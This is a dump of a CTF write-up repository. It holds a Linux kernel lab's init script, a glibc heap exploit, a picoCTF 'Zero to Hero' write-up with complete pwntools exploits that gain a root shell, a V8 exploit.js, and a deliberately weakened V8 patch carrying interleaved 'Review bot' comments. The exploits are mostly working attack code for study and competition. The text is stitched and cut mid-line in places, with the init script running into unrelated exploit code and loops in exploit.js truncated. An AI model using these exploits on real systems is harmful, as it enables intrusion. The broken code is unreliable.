-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/traceroute: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/traceroute6: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/true: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tty: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ttysize: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tunctl: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/udhcpc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/udhcpd: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/udpsvd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/umount: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unexpand: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uniq: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unix2dos: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unlzma: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unlzop: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unxz: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/unzip: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uptime: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/users: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/usleep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uudecode: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/uuencode: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/vconfig: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/vi: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/vlock: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/volname: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/wall: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/watch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/watchdog: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/wc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/wget: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/which: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/who: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/whoami: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/whois: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/xargs: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/xz: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/xzcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/yes: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/zcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/zcip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/exploit -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/exploit_modprobe_path: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/exploit_modprobe_path -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/flag: -------------------------------------------------------------------------------- 1 | inctf{} 2 | 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/home/user/root: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/home/user/root -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | export PATH=/bin 3 | 4 | [ -d /dev ] || mkdir -m 0755 /dev 5 | [ -d /sys ] || mkdir /sys 6 | [ -d /proc ] || mkdir /proc 7 | [ -d /tmp ] || mkdir /tmp 8 | [ -d /run ] || mkdir /run 9 | [ -d /root ] || mkdir /root 10 | [ -d /etc ] || mkdir /etc 11 | [ -d /home ] || mkdir /home 12 | 13 | echo 'root:x:0:0:root:/root:/bin/sh' > /etc/passwd 14 | echo 'root:x:0:' > /etc/group 15 | chmod 644 /etc/passwd 16 | chmod 644 /etc/group 17 | 18 | adduser user --disabled-password 19 | 20 | chown -R root:root / 21 | chmod 700 /flag 22 | chmod u+s /bin/busybox 23 | 24 | chmod 700 -R /root 25 | chown user:user -R /home/user 26 | chmod 777 /home/user 27 | chmod 755 /dev 28 | 29 | mkdir -p /var/lock 30 | mount -t sysfs -o nodev,noexec,nosuid sysfs /sys 31 | mount -t proc -o nodev,noexec,nosuid proc /proc 32 | ln -sf /proc/mounts /etc/mtab 33 | mount -t devtmpfs -o nosuid,mode=0755 udev /dev 34 | mkdir -p /dev/pts 35 | mount -t devpts -o noexec,nosuid,gid=5,mode=0620 devpts /dev/pts || true 36 | mount -t tmpfs -o "noexec,nosuid,size=10%,mode=0755" tmpfs /run 37 | 38 | insmod /mod.ko 39 | mknod /dev/mod c 100 0 40 | chmod o+rw /dev/mod 41 | 42 | echo 1 > /proc/sys/kernel/kptr_restrict 43 | echo 1 > /proc/sys/kernel/perf_event_paranoid 44 | 45 | cat < ', name) 11 | 12 | def add(size, content): 13 | p.sendlineafter('> ', '1') 14 | p.sendlineafter('> ', str(size)) 15 | p.sendafter('> ', content) 16 | 17 | def free(idx): 18 | p.sendlineafter('> ', '2') 19 | 
p.sendlineafter('> ', str(idx)) 20 | 21 | def reintroduce(name): 22 | p.sendlineafter('> ', '3') 23 | p.sendafter('> ', name) 24 | return p.recvuntil('1.',drop=True) 25 | 26 | init(p64(0)+p64(0x61)+p64(0)+p64(0x21)*((0x100-32)/8)) 27 | add(0x58,'e') #0 28 | add(0x58,'a') #1 29 | free(0) 30 | free(1) 31 | free(0) 32 | add(0x58,p64(0x602040)) #2 33 | add(0x58,p64(0)) #3 34 | add(0x58,p64(0)) #4 35 | add(0x58,p64(0)) #5 36 | reintroduce(p64(0x0)+p64(0x91)) 37 | free(5) 38 | libc.address = u64(reintroduce('A'*16)[:-2][-6:]+"\x00"*2)-0x3c4b78 39 | main_arena = libc.address+0x3c4b20 40 | log.success('Libc at: '+hex(libc.address)) 41 | log.success('Main arena: '+hex(libc.address+0x3c4b20)) 42 | reintroduce(p64(0)+p64(0x61)) 43 | add(0x58,p64(0)) #6 44 | reintroduce(p64(0x0)+p64(0x41)) 45 | free(6) 46 | reintroduce(p64(0x0)+p64(0x61)) 47 | free(6) 48 | reintroduce(p64(0)+p64(0x61)+p64(main_arena+18)) 49 | add(0x58,'a') #7 50 | add(0x58,'\x00'*54+p64(libc.symbols['__malloc_hook']-0x15)) #8 51 | add(0x20,"\x00"*5+p64(libc.address+0xf02a4)) #9 52 | free(3) 53 | free(3) 54 | p.interactive() 55 | -------------------------------------------------------------------------------- /picoctf/2019/pwn/sice_cream/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/sice_cream/libc-2.23.so -------------------------------------------------------------------------------- /picoctf/2019/pwn/sice_cream/sice_cream: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/sice_cream/sice_cream -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/README.md: -------------------------------------------------------------------------------- 1 | # Zero To 
Hero 2 | This was a fun challenge from picoCTF 2019. It was rated 500 points and had very few solves during the CTF, although it wasn't that tough. 3 | 4 | ## Description 5 | Now you're really cooking. Can you pwn this service?. Connect with `nc 2019shell1.picoctf.com 49929`. [libc.so.6](https://2019shell1.picoctf.com/static/40beb534349dda031d3c84a1ac1b4710/libc.so.6) [ld-2.29.so](https://2019shell1.picoctf.com/static/40beb534349dda031d3c84a1ac1b4710/ld-2.29.so) 6 | 7 | ## Quick Overview 8 | It's a 64-bit dynamically linked ELF executable - 9 | ```console 10 | root@kali:~/picoctf-2019/zero_to_hero# file ./zero_to_hero 11 | ./zero_to_hero: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /root/picoctf-2019/ld-2.29.so, for GNU/Linux 3.2.0, BuildID[sha1]=cf8bd977ca01d23e9b004a6dc637d6ab7c56e656, stripped 12 | ``` 13 | 14 | Running checksec - 15 | ```console 16 | root@kali:~/picoctf-2019/zero_to_hero# checksec ./zero_to_hero 17 | [*] '/root/picoctf-2019/zero_to_hero/zero_to_hero' 18 | Arch: amd64-64-little 19 | RELRO: Full RELRO 20 | Stack: Canary found 21 | NX: NX enabled 22 | PIE: No PIE (0x3ff000) 23 | RUNPATH: './' 24 | ``` 25 | Checksec shows us that everything except PIE is enabled. We'll later see that our solution works regardless of PIE. 26 | 27 | Running the binary - 28 | ```console 29 | From Zero to Hero 30 | So, you want to be a hero? 31 | y 32 | Really? Being a hero is hard. 33 | Fine. I see I can't convince you otherwise. 34 | It's dangerous to go alone. Take this: 0x7f777a154ff0 35 | 1. Get a superpower 36 | 2. Remove a superpower 37 | 3. Exit 38 | > 39 | ``` 40 | When we run it, it asks a y/n question; we send y and it loads the main program. It also leaks an address (probably some libc address?). 
41 | 42 | ## Decompiling & Analyzing the code 43 | 44 | main function - 45 | ```c 46 | void __fastcall __noreturn main(int a1, char **a2, char **a3) 47 | { 48 | int v3; // [rsp+Ch] [rbp-24h] 49 | char buf[24]; // [rsp+10h] [rbp-20h] 50 | unsigned __int64 v5; // [rsp+28h] [rbp-8h] 51 | 52 | v5 = __readfsqword(0x28u); 53 | setvbuf(stdin, 0LL, 2, 0LL); 54 | setvbuf(stdout, 0LL, 2, 0LL); 55 | setvbuf(stderr, 0LL, 2, 0LL); 56 | puts("From Zero to Hero"); 57 | puts("So, you want to be a hero?"); 58 | buf[read(0, buf, 0x14uLL)] = 0; 59 | if ( buf[0] != 121 ) 60 | { 61 | puts("No? Then why are you even here?"); 62 | exit(0); 63 | } 64 | puts("Really? Being a hero is hard."); 65 | puts("Fine. I see I can't convince you otherwise."); 66 | printf("It's dangerous to go alone. Take this: %p\n", &system); 67 | while ( 1 ) 68 | { 69 | while ( 1 ) 70 | { 71 | sub_400997(); 72 | printf("> "); 73 | v3 = 0; 74 | __isoc99_scanf("%d", &v3); 75 | getchar(); 76 | if ( v3 != 2 ) 77 | break; 78 | sub_400BB3(); 79 | } 80 | if ( v3 == 3 ) 81 | break; 82 | if ( v3 != 1 ) 83 | goto LABEL_10; 84 | sub_400A4D(); 85 | } 86 | puts("Giving up?"); 87 | LABEL_10: 88 | exit(0); 89 | } 90 | ``` 91 | 92 | create superpower - 93 | ```c 94 | unsigned __int64 sub_400A4D() 95 | { 96 | __int64 v0; // rbx 97 | size_t size; // [rsp+0h] [rbp-20h] 98 | unsigned __int64 v3; // [rsp+8h] [rbp-18h] 99 | 100 | v3 = __readfsqword(0x28u); 101 | LODWORD(size) = 0; 102 | HIDWORD(size) = sub_4009C2(); 103 | if ( (size & 0x8000000000000000LL) != 0LL ) 104 | { 105 | puts("You have too many powers!"); 106 | exit(-1); 107 | } 108 | puts("Describe your new power."); 109 | puts("What is the length of your description?"); 110 | printf("> "); 111 | __isoc99_scanf("%u", &size); 112 | getchar(); 113 | if ( (unsigned int)size > 0x408 ) 114 | { 115 | puts("Power too strong!"); 116 | exit(-1); 117 | } 118 | *((_QWORD *)&unk_602060 + SHIDWORD(size)) = malloc((unsigned int)size); 119 | puts("Enter your description: "); 120 | printf("> 
"); 121 | v0 = *((_QWORD *)&unk_602060 + SHIDWORD(size)); 122 | *(_BYTE *)(v0 + read(0, *((void **)&unk_602060 + SHIDWORD(size)), (unsigned int)size)) = 0; 123 | puts("Done!"); 124 | return __readfsqword(0x28u) ^ v3; 125 | } 126 | ``` 127 | 128 | delete superpower - 129 | ```c 130 | unsigned __int64 sub_400BB3() 131 | { 132 | unsigned int v1; // [rsp+4h] [rbp-Ch] 133 | unsigned __int64 v2; // [rsp+8h] [rbp-8h] 134 | 135 | v2 = __readfsqword(0x28u); 136 | v1 = 0; 137 | puts("Which power would you like to remove?"); 138 | printf("> "); 139 | __isoc99_scanf("%u", &v1); 140 | getchar(); 141 | if ( v1 > 6 ) 142 | { 143 | puts("Invalid index!"); 144 | exit(-1); 145 | } 146 | free(*((void **)&unk_602060 + v1)); 147 | return __readfsqword(0x28u) ^ v2; 148 | } 149 | ``` 150 | 151 | * Looking at the main function, it leaks the address of system, as we saw earlier. 152 | * Option 1 creates a superpower and option 2 deletes one. 153 | * We can only create chunks no larger than 0x408 bytes, and we can only call malloc 7 times, which means we are limited to tcache. 154 | * Input is taken through the read function, so we can have null bytes in our payload. 155 | * There is a null byte overflow bug while reading the description: the terminating null is written at the offset returned by read, so a description that fills the whole buffer puts the null one byte past its end. 156 | * We have a double free in the delete superpower function, as the pointer is not nulled after it's freed. 157 | 158 | ## Exploitation 159 | Now that we have a double free bug, we could simply free a chunk twice and do tcache poisoning, but that won't work because the binary uses libc 2.29 and not libc 2.27. 160 | There was a mitigation introduced in libc 2.28 because of which you can no longer double free chunks. 161 | 162 | We can look at the definition of tcache_entry here - https://elixir.bootlin.com/glibc/glibc-2.29/source/malloc/malloc.c#L2904 163 | ```c 164 | typedef struct tcache_entry 165 | { 166 | struct tcache_entry *next; 167 | /* This field exists to detect double frees. 
*/ 168 | struct tcache_perthread_struct *key; 169 | } tcache_entry; 170 | ``` 171 | 172 | It uses the key field, a pointer to the tcache_perthread_struct, to detect double frees. 173 | In short, when a chunk is freed, free checks whether its key is equal to the tcache_perthread_struct and, if so, iterates over the tcache bin for the chunk's size to check whether the chunk is already there. 174 | If it is, the program aborts with a "double free detected" error. 175 | 176 | One way around this would be to somehow clear the key field of the already-freed chunk, but this is not possible in our case. 177 | 178 | But as we have a null byte overflow bug, the following can be done - 179 | * Create two contiguous chunks. (size of the second chunk should be > 0x100) 180 | * Free the first and second chunks. 181 | * Allocate the first chunk again. 182 | * Use the null byte overflow on the first chunk and change the size of the second chunk. 183 | * Now we can again free the second chunk, getting a double free. 184 | 185 | ```python 186 | malloc(0x18,'a') # First chunk 187 | malloc(0x118,'b') # Second chunk 188 | malloc(0x118,'c') # third chunk (just for tcache count) 189 | 190 | free(0) # goes to 0x20 tcache bin 191 | free(2) # goes to 192 | free(1) # 0x120 tcache bin 193 | 194 | malloc(0x18,'A'*0x18) #Allocate chunk 1 back from 0x20 tcache bin and do null byte overflow. 195 | free(1) # chunk 2 size changed to 0x100 so we can double free it. 196 | ``` 197 | 198 | Now that we have a double free, we could simply do tcache poisoning into &__free_hook and write system. 199 | Then freeing a chunk pointing to "/bin/sh\0" will give us a shell. 
200 | 201 | ```python 202 | malloc(0xf8,p64(libc.symbols['__free_hook'])) # tcache poisoning 203 | malloc(0x118,'/bin/sh\x00') 204 | malloc(0x118,p64(libc.symbols['system'])) # malloc returns &__free_hook 205 | free(1) # system("/bin/sh") 206 | ``` 207 | 208 | Final exploit - 209 | ```python 210 | #!/usr/bin/env python 211 | 212 | from pwn import * 213 | 214 | p = process('./zero_to_hero') 215 | e = ELF('./zero_to_hero') 216 | libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') 217 | 218 | def malloc(size,data): 219 | p.sendlineafter('> ','1') 220 | p.sendlineafter('> ',str(size)) 221 | p.sendafter('> ',data) 222 | 223 | def free(idx): 224 | p.sendlineafter('> ','2') 225 | p.sendlineafter('> ',str(idx)) 226 | 227 | def die(): 228 | p.sendlineafter('> ','3') 229 | 230 | p.sendlineafter('?\n','y') 231 | 232 | for i in xrange(2): 233 | p.recvline() 234 | 235 | system = int(p.recvline().strip().split(' ')[-1],16) 236 | libc.address = system-libc.symbols['system'] 237 | 238 | log.success('libc base at: '+hex(libc.address)) 239 | log.success('system at: '+hex(system)) 240 | log.success('free hook at: '+hex(libc.symbols['__free_hook'])) 241 | 242 | malloc(0x18,'a') # First chunk 243 | malloc(0x118,'b') # Second chunk 244 | malloc(0x118,'c') # third chunk (just for tcache count) 245 | 246 | free(0) # goes to 0x20 tcache bin 247 | free(2) # goes to 248 | free(1) # 0x120 tcache bin 249 | 250 | malloc(0x18,'A'*0x18) #Allocate chunk 1 back from 0x20 tcache bin and do null byte overflow. 251 | free(1) # chunk 2 size changed to 0x100 so we can double free it. 
252 | 253 | malloc(0xf8,p64(libc.symbols['__free_hook'])) # tcache poisoning 254 | malloc(0x118,'/bin/sh\x00') 255 | malloc(0x118,p64(libc.symbols['system'])) # malloc returns &__free_hook 256 | free(1) # system("/bin/sh") 257 | 258 | p.interactive() 259 | ``` 260 | 261 | Running the exploit - 262 | ```console 263 | root@kali:~/bak/picoctf-2019/zero_to_hero# python exp.py 264 | [+] Starting local process './zero_to_hero': pid 965814 265 | [*] '/root/bak/picoctf-2019/zero_to_hero/zero_to_hero' 266 | Arch: amd64-64-little 267 | RELRO: Full RELRO 268 | Stack: Canary found 269 | NX: NX enabled 270 | PIE: No PIE (0x400000) 271 | RUNPATH: './' 272 | [*] '/lib/x86_64-linux-gnu/libc.so.6' 273 | Arch: amd64-64-little 274 | RELRO: Partial RELRO 275 | Stack: Canary found 276 | NX: NX enabled 277 | PIE: PIE enabled 278 | [+] libc base at: 0x7fb33f4df000 279 | [+] system at: 0x7fb33f525ff0 280 | [+] free hook at: 0x7fb33f69b5a8 281 | [*] Switching to interactive mode 282 | $ id 283 | uid=0(root) gid=0(root) groups=0(root) 284 | ``` 285 | -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | #p = process('./zero_to_hero') 6 | p = remote('2019shell1.picoctf.com',49929) 7 | e = ELF('./zero_to_hero') 8 | libc = ELF('./libc.so.6') 9 | 10 | def malloc(size,data): 11 | p.sendlineafter('> ','1') 12 | p.sendlineafter('> ',str(size)) 13 | p.sendafter('> ',data) 14 | 15 | def free(idx): 16 | p.sendlineafter('> ','2') 17 | p.sendlineafter('> ',str(idx)) 18 | 19 | def die(): 20 | p.sendlineafter('> ','3') 21 | 22 | p.sendlineafter('?\n','y') 23 | 24 | for i in xrange(2): 25 | p.recvline() 26 | 27 | system = int(p.recvline().strip().split(' ')[-1],16) 28 | libc.address = system-libc.symbols['system'] 29 | 30 | log.success('libc base at: '+hex(libc.address)) 31 | log.success('system 
at: '+hex(system)) 32 | log.success('free hook at: '+hex(libc.symbols['__free_hook'])) 33 | 34 | malloc(0x58,'a') 35 | malloc(0x178,'b') 36 | 37 | free(0) 38 | free(1) 39 | 40 | malloc(0x58,'A'*0x58) 41 | free(1) 42 | 43 | malloc(0xf8,p64(libc.symbols['__free_hook'])) 44 | malloc(0x178,'a') 45 | 46 | malloc(0x178,p64(libc.symbols['system'])) 47 | 48 | malloc(0x20,'/bin/sh\x00') 49 | free(6) 50 | 51 | p.interactive() 52 | -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/zero_to_hero/libc.so.6 -------------------------------------------------------------------------------- /picoctf/2019/pwn/zero_to_hero/zero_to_hero: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/picoctf/2019/pwn/zero_to_hero/zero_to_hero -------------------------------------------------------------------------------- /tctf/chromium_rce/d8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/tctf/chromium_rce/d8 -------------------------------------------------------------------------------- /tctf/chromium_rce/exploit.js: -------------------------------------------------------------------------------- 1 | function free(buf) 2 | { 3 | %ArrayBufferDetach(buf.buffer); 4 | } 5 | 6 | function u64(buf) 7 | { 8 | let x = BigInt(0); 9 | for(i=0;i<8;++i) 10 | x += BigInt(buf[i]) << BigInt(i*8); 11 | return x; 12 | } 13 | 14 | function malloc(contents) 15 | { 16 | let x = {}; 17 | for(i=0;i>= 0x8n; 30 | } 31 | return x; 32 | } 33 | 34 | function calloc(size) 35 | { 36 | return new 
Uint8Array(size); 37 | } 38 | 39 | function encode(s) { 40 | let a = new Uint8Array(s.length); 41 | for (let i = 0; i < s.length; i++) { 42 | a[i] = s.charCodeAt(i); 43 | } 44 | return a; 45 | } 46 | 47 | let a = new Uint8Array(0x1000); 48 | let b = new Uint8Array(0x440); 49 | let c = new Uint8Array(0x440); 50 | 51 | free(b); 52 | free(c); 53 | a.set(c); 54 | 55 | let heap_leak = u64(a.slice(0,8)); 56 | let libc_leak = u64(a.slice(8,16)) - 0x3ebca0n; // - 0x1b9ca0n; 57 | let free_hook = libc_leak + 0x3ed8e8n; //+0x1bc5a8n; 58 | console.log("Heap leak: 0x"+heap_leak.toString(16)); 59 | console.log("Libc leak: 0x"+libc_leak.toString(16)); 60 | console.log("__free_hook: 0x"+free_hook.toString(16)) 61 | 62 | let c1 = calloc(0x80); 63 | free(c1); 64 | c1.set(p64(free_hook)); 65 | 66 | system = libc_leak + 0x4f440n;//+ 0x46ff0n; 67 | f = new Array(0x80).fill(0); 68 | for (i=0;i<8;++i) 69 | { 70 | f[i] = Number(system & 0xffn); 71 | system >>= 8n; 72 | } 73 | malloc(f); 74 | 75 | let _cmd = calloc(0x100); 76 | cmd = "/readflag; sleep 1000" 77 | for(i=0;i(target); 11 | 12 | const overloadedArg = arguments[0]; 13 | try { 14 | @@ -86,8 +86,7 @@ TypedArrayPrototypeSet( 15 | // 10. Let srcBuffer be typedArray.[[ViewedArrayBuffer]]. 16 | // 11. If IsDetachedBuffer(srcBuffer) is true, throw a TypeError 17 | // exception. 18 | - const utypedArray = 19 | - typed_array::EnsureAttached(typedArray) otherwise IsDetached; 20 | + const utypedArray = %RawDownCast(typedArray); 21 | 22 | TypedArrayPrototypeSetTypedArray( 23 | utarget, utypedArray, targetOffset, targetOffsetOverflowed) 24 | diff --git a/src/d8/d8.cc b/src/d8/d8.cc 25 | index 117df1cc52..9c6ca7275d 100644 26 | --- a/src/d8/d8.cc 27 | +++ b/src/d8/d8.cc 28 | 
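Review bot: The `@@ -86,8 +86,7 @@ TypedArrayPrototypeSet(` hunk removes the detached-buffer check that the comment directly above it still quotes as spec steps 10–11. `%RawDownCast` converts the source array without testing it, where `typed_array::EnsureAttached(typedArray) otherwise IsDetached` branched to the TypeError path. A source array whose buffer has been detached is therefore handed to `TypedArrayPrototypeSetTypedArray`, which presumably copies from backing memory the array no longer owns. The line should stay `const utypedArray = typed_array::EnsureAttached(typedArray) otherwise IsDetached;`. The text before this hunk is damaged in this copy, so whether the first hunk makes the same change to the target array cannot be checked from here, and the builtin continues outside the hunk.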
@@ -1339,9 +1339,9 @@ MaybeLocal Shell::CreateRealm(
29 | }
30 | delete[] old_realms;
31 | }
32 | - Local global_template = CreateGlobalTemplate(isolate);
33 | Local context =
34 | - Context::New(isolate, nullptr, global_template, global_object);
35 | + Context::New(isolate, nullptr, ObjectTemplate::New(isolate),
36 | + v8::MaybeLocal());
37 | DCHECK(!try_catch.HasCaught());
38 | if (context.IsEmpty()) return MaybeLocal();
39 | InitializeModuleEmbedderData(context);
40 | @@ -2260,10 +2260,7 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
41 | v8::Isolate::kMessageLog);
42 | }
43 |
44 | - isolate->SetHostImportModuleDynamicallyCallback(
45 | - Shell::HostImportModuleDynamically);
46 | - isolate->SetHostInitializeImportMetaObjectCallback(
47 | - Shell::HostInitializeImportMetaObject);
48 | + // `import("xx")` is not allowed
49 |
50 | #ifdef V8_FUZZILLI
51 | // Let the parent process (Fuzzilli) know we are ready.
52 | @@ -2285,9 +2282,9 @@ Local Shell::CreateEvaluationContext(Isolate* isolate) {
53 | // This needs to be a critical section since this is not thread-safe
54 | base::MutexGuard lock_guard(context_mutex_.Pointer());
55 | // Initialize the global objects
56 | - Local global_template = CreateGlobalTemplate(isolate);
57 | EscapableHandleScope handle_scope(isolate);
58 | - Local context = Context::New(isolate, nullptr, global_template);
59 | + Local context = Context::New(isolate, nullptr,
60 | + ObjectTemplate::New(isolate));
61 | DCHECK(!context.IsEmpty());
62 | if (i::FLAG_perf_prof_annotate_wasm || i::FLAG_vtune_prof_annotate_wasm) {
63 | isolate->SetWasmLoadSourceMapCallback(ReadFile);
64 | diff --git a/src/parsing/parser-base.h b/src/parsing/parser-base.h
65 | index 3519599a88..f1ba0fb445 100644
66 | --- a/src/parsing/parser-base.h
67 | +++ b/src/parsing/parser-base.h
68 |
@@ -1907,10 +1907,8 @@ ParserBase::ParsePrimaryExpression() {
69 | return ParseTemplateLiteral(impl()->NullExpression(), beg_pos, false);
70 |
71 | case Token::MOD:
72 | - if (flags().allow_natives_syntax() || extension_ != nullptr) {
73 | - return ParseV8Intrinsic();
74 | - }
75 | - break;
76 | + // Directly call %ArrayBufferDetach without `--allow-native-syntax` flag
77 | + return ParseV8Intrinsic();
78 |
79 | default:
80 | break;
81 | diff --git a/src/parsing/parser.cc b/src/parsing/parser.cc
82 | index 9577b37397..2206d250d7 100644
83 | --- a/src/parsing/parser.cc
84 | +++ b/src/parsing/parser.cc
85 | @@ -357,6 +357,11 @@ Expression* Parser::NewV8Intrinsic(const AstRawString* name,
86 | const Runtime::Function* function =
87 | Runtime::FunctionForName(name->raw_data(), name->length());
88 |
89 | + // Only %ArrayBufferDetach allowed
90 | + if (function->function_id != Runtime::kArrayBufferDetach) {
91 | + return factory()->NewUndefinedLiteral(kNoSourcePosition);
92 | + }
93 | +
94 | // Be more permissive when fuzzing. Intrinsics are not supported.
95 | if (FLAG_fuzzing) {
96 | return NewV8RuntimeFunctionForFuzzing(function, args, pos);
97 | --------------------------------------------------------------------------------
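Review bot: In the `case Token::MOD:` branch of the parser-base.h hunk, every `%name(...)` in script source now reaches `ParseV8Intrinsic()` without consulting `flags().allow_natives_syntax()`. The only remaining barrier between untrusted script and the runtime-function table is the allowlist added to `Parser::NewV8Intrinsic` in the other file. The branch should record that dependency where the gate was removed, for example `// Safe only while Parser::NewV8Intrinsic rejects everything except %ArrayBufferDetach`. The added comment also names the flag as `--allow-native-syntax`, while the removed condition suggests `--allow-natives-syntax`. `ParsePrimaryExpression` starts and ends outside the hunk.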
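Review bot: The allowlist check added in the parser.cc hunk reads `function->function_id` before anything in the hunk establishes that `function` is non-null. If `Runtime::FunctionForName` returns a null pointer for a name it does not know (its contract is not shown here), any unrecognised `%name()` in script source would crash the parser instead of evaluating to undefined. Guard the dereference with `if (function == nullptr || function->function_id != Runtime::kArrayBufferDetach) {`. The check sits above the `FLAG_fuzzing` branch, so it applies to fuzzing builds as well, and `NewV8Intrinsic` continues outside the hunk.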